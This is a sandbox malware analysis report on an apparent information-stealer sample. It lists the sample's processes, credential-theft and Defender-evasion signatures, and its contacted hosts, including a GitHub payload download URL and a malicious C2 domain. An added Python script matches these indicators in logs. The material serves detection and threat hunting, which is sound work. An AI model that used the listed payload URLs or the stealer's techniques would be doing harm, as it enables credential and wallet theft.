svchost.exe [14]: DNS/IP: 127.0.0.1 unknown unknown.

25aac720-4b65-4596-94df-b9a776dc62c7.exe [16]: DNS/IP: t.me 149.154.167.99, 443, 49738 TELEGRAMRU United Kingdom; kresk.lol 159.69.102.165, 443, 49739, 49740 HETZNER-ASDE Germany. Signatures: Multi AV Scanner detection for dropped file; Attempt to bypass Chrome Application-Bound Encryption; Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); 5 other signatures. Started: chrome.exe [26]; cmd.exe [29].

powershell.exe [20] (7): Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Adds a directory exclusion to Windows Defender. Started: powershell.exe [31]; conhost.exe [34].

powershell.exe [22] (7): Started: powershell.exe [36]; conhost.exe [38].

2 other processes [24]: Started: powershell.exe [40]; conhost.exe [42].

chrome.exe [26]: DNS/IP: 239.255.255.250 unknown Reserved. Started: chrome.exe [44].

cmd.exe [29]: Started: conhost.exe [47]; timeout.exe [49].

powershell.exe [31] (23): Signatures: Loading BitLocker PowerShell Module.

powershell.exe [36] (23), powershell.exe [40] (23): no further graph data.

chrome.exe [44]: DNS/IP: www.google.com 142.250.181.68, 443, 49746, 49750 GOOGLEUS United States.

Source | Detection | Scanner | Label | Link
Ttok18.exe | 18% | ReversingLabs | Win32.Trojan.Genie |
Ttok18.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | 100% | Joe Sandbox ML | |
C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe | 45% | ReversingLabs | Win32.Trojan.Generic |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
https://kresk.lol/% | 100% | Avira URL Cloud | malware |
https://kresk.lol/a | 100% | Avira URL Cloud | malware |
https://kresk.lolIM7GLNO8 | 0% | Avira URL Cloud | safe |
https://kresk.lol/ | 100% | Avira URL Cloud | malware |
https://kresk.loltosh; | 0% | Avira URL Cloud | safe |
https://kresk.lol | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
github.com | 20.233.83.145 | true | false | | high
raw.githubusercontent.com | 185.199.111.133 | true | false | | high
t.me | 149.154.167.99 | true | false | | high
www.google.com | 142.250.181.68 | true | false | | high
kresk.lol | 159.69.102.165 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://t.me/m3wm0w | false | | high
https://github.com/olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe | false | | high
https://raw.githubusercontent.com/olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe | false | | high
https://kresk.lol/ | true | Avira URL Cloud: malware | unknown
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 | false | | high
https://www.google.com/async/newtab_promos | false | | high
https://www.google.com/async/ddljson?async=ntp:2 | false | | high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
                                    https://duckduckgo.com/chrome_newtab25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.drfalse
                                      high
                                      https://t.me/25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754848565.00000000007FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/ac/?q=25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.drfalse
                                          high
                                          https://web.telegram.org25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000003.2015843390.000000000087C000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000003.2015843390.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754848565.0000000000842000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://crl.microsoftpowershell.exe, 00000004.00000002.1771954716.0000000007E10000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://github.comTtok18.exe, 00000000.00000002.1998627591.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://contoso.com/Licensepowershell.exe, 0000000B.00000002.1881604407.00000000060AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000037B1000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2757142044.0000000003A95000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758340316.0000000003C66000.00000004.00000020.00020000.00000000.sdmp, W4OHLX.15.drfalse
                                                    high
                                                    https://kresk.lol/%25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000003.2042357919.0000000000874000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://g.live.com/odclientsettings/ProdV2.C:edb.log.17.dr, qmgr.db.17.drfalse
                                                      high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.drfalse
                                                        high
                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e1725aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000036EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://g.live.com/odclientsettings/Prod.C:edb.log.17.dr, qmgr.db.17.drfalse
                                                            high
                                                            http://github.comTtok18.exe, 00000000.00000002.1998627591.0000000002EAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://t.me/m3wm0wQ25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754848565.0000000000842000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://steamcommunity.com/profiles/76561199804377619p1up1Mozilla/5.025aac720-4b65-4596-94df-b9a776dc62c7.exe.0.drfalse
                                                                  high
                                                                  https://g.live.com/odclientsettings/ProdV2edb.log.17.dr, qmgr.db.17.drfalse
                                                                    high
                                                                    https://kresk.lolIM7GLNO825aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://steamcommunity.com/profiles/76561199804377619Ttok18.exe, 00000000.00000002.2001059620.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000000.1992854779.000000000045C000.00000008.00000001.01000000.00000008.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe.0.drfalse
                                                                      high
                                                                      https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.1775233319.00000000042C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1775233319.00000000042D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1761784248.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1819373125.000000000433E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1798740573.0000000004841000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1900270450.00000000044A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1900270450.000000000447B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1865159775.0000000005041000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiW4OHLX.15.drfalse
                                                                          high
                                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000036C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.drfalse
                                                                              high
                                                                              https://contoso.com/powershell.exe, 0000000B.00000002.1881604407.00000000060AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1763834008.000000000590A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1807167831.00000000058AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1881604407.00000000060AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://kresk.lol25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754848565.0000000000842000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://support.mozilla.org/products/firefoxgro.all25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758763558.0000000003EE2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameTtok18.exe, 00000000.00000002.1998627591.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1775233319.00000000042F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1761784248.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1819373125.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1798740573.0000000004841000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1900270450.0000000004529000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1865159775.0000000005041000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000011.00000003.2174104393.000002A4586C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.drfalse
                                                                                        high
                                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc9425aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000037B1000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2757142044.0000000003A95000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758340316.0000000003C66000.00000004.00000020.00020000.00000000.sdmp, W4OHLX.15.drfalse
                                                                                          high
                                                                                          http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1763834008.000000000590A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1807167831.00000000058AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1881604407.00000000060AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000037B1000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2757142044.0000000003A95000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758340316.0000000003C66000.00000004.00000020.00020000.00000000.sdmp, W4OHLX.15.drfalse
                                                                                              high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.dr | malicious: false | reputation: high
http://pesterbdd.com/images/Pester.png | source: powershell.exe, 0000000B.00000002.1865159775.0000000005196000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
http://schemas.xmlsoap.org/soap/encoding/ | source: powershell.exe, 00000004.00000002.1761784248.00000000049F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1798740573.0000000004996000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1865159775.0000000005196000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
http://www.apache.org/licenses/LICENSE-2.0.html | source: powershell.exe, 0000000B.00000002.1865159775.0000000005196000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
http://raw.githubusercontent.comd | source: Ttok18.exe, 00000000.00000002.1998627591.0000000002EF4000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
https://contoso.com/Icon | source: powershell.exe, 0000000B.00000002.1881604407.00000000060AA000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.dr | malicious: false | reputation: high
http://crl.ver) | source: svchost.exe, 00000011.00000002.2956329681.000002A458400000.00000004.00000020.00020000.00000000.sdmp | malicious: false | reputation: high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta | source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000037B1000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2757142044.0000000003A95000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758340316.0000000003C66000.00000004.00000020.00020000.00000000.sdmp, W4OHLX.15.dr | malicious: false | reputation: high
https://t.me/m3wm0wG | source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754848565.0000000000842000.00000004.00000020.00020000.00000000.sdmp | malicious: false | reputation: high
http://github.comd | source: Ttok18.exe, 00000000.00000002.1998627591.0000000002EAF000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000036EB000.00000004.00000020.00020000.00000000.sdmp | malicious: false | reputation: high
https://aka.ms/pscore6LR | source: powershell.exe, 00000006.00000002.1819373125.0000000004329000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
https://www.ecosia.org/newtab/ | source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.dr | malicious: false | reputation: high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758763558.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp | malicious: false | reputation: high
https://github.com/Pester/Pester | source: powershell.exe, 0000000B.00000002.1865159775.0000000005196000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
https://kresk.lol/a | source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000003.2042357919.0000000000874000.00000004.00000020.00020000.00000000.sdmp | malicious: false | Avira URL Cloud: malware | reputation: unknown
https://ac.ecosia.org/autocomplete?q= | source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.dr | malicious: false | reputation: high
https://kresk.loltosh; | source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
https://t.me/m3wm0wp1up1Mozilla/5.0 | source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe.0.dr | malicious: false | reputation: high
http://crl.micro | source: powershell.exe, 00000004.00000002.1760994768.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1812180298.000000000709B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1888125617.000000000780A000.00000004.00000020.00020000.00000000.sdmp | malicious: false | reputation: high
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96 | source: svchost.exe, 00000011.00000003.2174104393.000002A4586C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr | malicious: false | reputation: high
https://raw.githubusercontent.com | source: Ttok18.exe, 00000000.00000002.1998627591.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000037B1000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2757142044.0000000003A95000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2758340316.0000000003C66000.00000004.00000020.00020000.00000000.sdmp, W4OHLX.15.dr | malicious: false | reputation: high
http://schemas.xmlsoap.org/wsdl/ | source: powershell.exe, 00000004.00000002.1761784248.00000000049F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1798740573.0000000004996000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1865159775.0000000005196000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
http://raw.githubusercontent.com | source: Ttok18.exe, 00000000.00000002.1998627591.0000000002EF4000.00000004.00000800.00020000.00000000.sdmp | malicious: false | reputation: high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.00000000036C7000.00000004.00000020.00020000.00000000.sdmp | malicious: false | reputation: high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2756165023.000000000379F000.00000004.00000020.00020000.00000000.sdmp, SJMO89.15.dr | malicious: false | reputation: high
IP | Domain | Country | ASN | ASN Name | Malicious
20.233.83.145 | github.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
185.199.111.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAMRU | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
159.69.102.165 | kresk.lol | Germany | 24940 | HETZNER-ASDE | false
142.250.181.68 | www.google.com | United States | 15169 | GOOGLEUS | false
IP
127.0.0.1
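The network indicators in the tables above, turned into a small hunt over proxy and DNS logs. This is an added example and not part of the Joe Sandbox report: the indicator values come from the report's URL and IP tables, the log line format and the log lines themselves are constructed here, and using /m3wm0w as the Telegram channel path (the common prefix of the two garbled t.me strings in the URL table) is an assumption. The point it makes is which of the listed hosts are usable as indicators: kresk.lol and 159.69.102.165 can be matched on their own, the t.me channel URL (a pattern the Vidar family is known to use for fetching its C2 address) only together with its path, and github.com, raw.githubusercontent.com and www.google.com are shared public services that the scan surfaces as context rather than as hits.

```python
# Added example: hunt for the report's network indicators in proxy/DNS logs.
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# Report IP table: kresk.lol resolved to 159.69.102.165 (Hetzner); report URL
# table: https://kresk.lol/a was flagged "malware" by Avira URL Cloud.
SUSPICIOUS_HOSTS = {"kresk.lol"}
SUSPICIOUS_IPS = {ipaddress.ip_address("159.69.102.165")}
# t.me is Telegram's public domain, so the host alone is not an indicator. The
# report lists https://t.me/m3wm0wG and https://t.me/m3wm0wp1up1... (strings
# with trailing memory junk); /m3wm0w as the channel path is an assumption.
SUSPICIOUS_URL_PREFIXES = {("t.me", "/m3wm0w")}
# Shared public services also present in the report: context, not hits.
SHARED_HOSTS = {"github.com", "raw.githubusercontent.com", "www.google.com", "t.me"}

@dataclass(frozen=True)
class Hit:
    line_no: int
    kind: str       # "dns" or "http"
    indicator: str  # indicator that matched
    raw: str        # original log line

def _is_suspicious_ip(text: str) -> bool:
    try:
        return ipaddress.ip_address(text) in SUSPICIOUS_IPS
    except ValueError:
        return False  # a host name, not an address literal

def _host_and_path(target: str) -> Tuple[str, str]:
    """Split an HTTP target into (host, path); CONNECT targets are host:port."""
    if "://" not in target:
        target = "//" + target  # so urlsplit treats it as a netloc
    parts = urlsplit(target)
    return (parts.hostname or "").lower(), parts.path or "/"

def classify_http(target: str) -> Optional[str]:
    """Indicator matched by an HTTP/CONNECT target, or None."""
    host, path = _host_and_path(target)
    if host in SUSPICIOUS_HOSTS or _is_suspicious_ip(host):
        return host
    for ioc_host, prefix in SUSPICIOUS_URL_PREFIXES:
        if host == ioc_host and path.startswith(prefix):
            return f"{ioc_host}{prefix}"
    return None

def classify_dns(qname: str, answer: str) -> Optional[str]:
    """Indicator matched by a DNS query/answer pair, or None."""
    qname = qname.lower().rstrip(".")
    if qname in SUSPICIOUS_HOSTS:
        return qname
    return answer if _is_suspicious_ip(answer) else None

def _parse(line: str) -> Optional[Tuple[str, str, Optional[str]]]:
    """Constructed format: '<ts> <src> DNS <qname> <rtype> <answer>' or
    '<ts> <src> HTTP <method> <target> <status>'. Returns (kind, host, ioc)."""
    f = line.split()
    if len(f) < 6:
        return None
    if f[2] == "DNS":
        return "dns", f[3].lower().rstrip("."), classify_dns(f[3], f[5])
    if f[2] == "HTTP":
        return "http", _host_and_path(f[4])[0], classify_http(f[4])
    return None

def scan(log_text: str) -> List[Hit]:
    """Every line that matches an indicator."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        parsed = _parse(line)
        if parsed and parsed[2]:
            hits.append(Hit(n, parsed[0], parsed[2], line))
    return hits

def shared_host_lines(log_text: str) -> List[int]:
    """Lines touching a shared host with no indicator match: triage context."""
    out = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        parsed = _parse(line)
        if parsed and parsed[2] is None and parsed[1] in SHARED_HOSTS:
            out.append(n)
    return out

# Constructed sample log, not taken from the report's PCAP.
SAMPLE_LOG = """\
2024-12-04T16:04:19Z 10.0.0.5 DNS github.com A 20.233.83.145
2024-12-04T16:04:19Z 10.0.0.5 HTTP GET https://raw.githubusercontent.com/example/example/main/example.txt 200
2024-12-04T16:04:20Z 10.0.0.5 HTTP GET https://t.me/m3wm0w 200
2024-12-04T16:04:21Z 10.0.0.5 DNS kresk.lol A 159.69.102.165
2024-12-04T16:04:21Z 10.0.0.5 HTTP GET https://kresk.lol/a 200
2024-12-04T16:04:30Z 10.0.0.7 HTTP GET https://t.me/telegram 200
2024-12-04T16:04:31Z 10.0.0.7 HTTP CONNECT 159.69.102.165:443 200
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit.line_no}: {hit.kind} matched {hit.indicator}: {hit.raw}")
```

Run as a script it prints the four matching lines; the constructed log deliberately pairs the t.me/m3wm0w request with a benign t.me/telegram request so the host-plus-path rule is exercised, and puts the IP match on a CONNECT target to show that the IP indicator still catches traffic that never resolved the name.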
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1568488
Start date and time:2024-12-04 17:03:00 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 7m 37s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:23
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:Ttok18.exe
Detection:MAL
Classification:mal100.troj.spyw.evad.winEXE@41/51@6/7
EGA Information:
• Successful, ratio: 37.5%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 352
• Number of non-executed functions: 44
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 216.58.208.227, 172.217.17.78, 64.233.164.84, 172.217.17.46, 172.217.17.67, 23.218.208.109
• Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, e16604.g.akamaiedge.net, clients.l.google.com, www.gstatic.com, prod.fs.microsoft.com.akadns.net
• Execution Graph export aborted for target powershell.exe, PID 2472 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 5352 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7300 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7408 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7548 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Ttok18.exe
Time | Type | Description
11:03:58 | API Interceptor | 33x Sleep call for process: powershell.exe modified
11:04:17 | API Interceptor | 50x Sleep call for process: Ttok18.exe modified
11:04:41 | API Interceptor | 2x Sleep call for process: svchost.exe modified
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  20.233.83.145https://github.com/kernelwernel/VMAware/releases/download/v1.9/vmaware64.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    SplpM1fFkV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      TikTokDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                        TTDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                          TTDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                            TT18.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                              Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                rookie_2.30.0_portable.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                  secondaryTask.vbsGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                                                                                                                                    LauncherPred8.3.389 stablesetup.msiGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                                                                                                                                      185.199.111.133cr_asm2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                                      cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                                                                                                      cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
|  | BeginSync lnk.lnk | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt |
| 149.154.167.99 | http://xn--r1a.website/s/ogorodru | malicious | Unknown | telegram.org/img/favicon.ico |
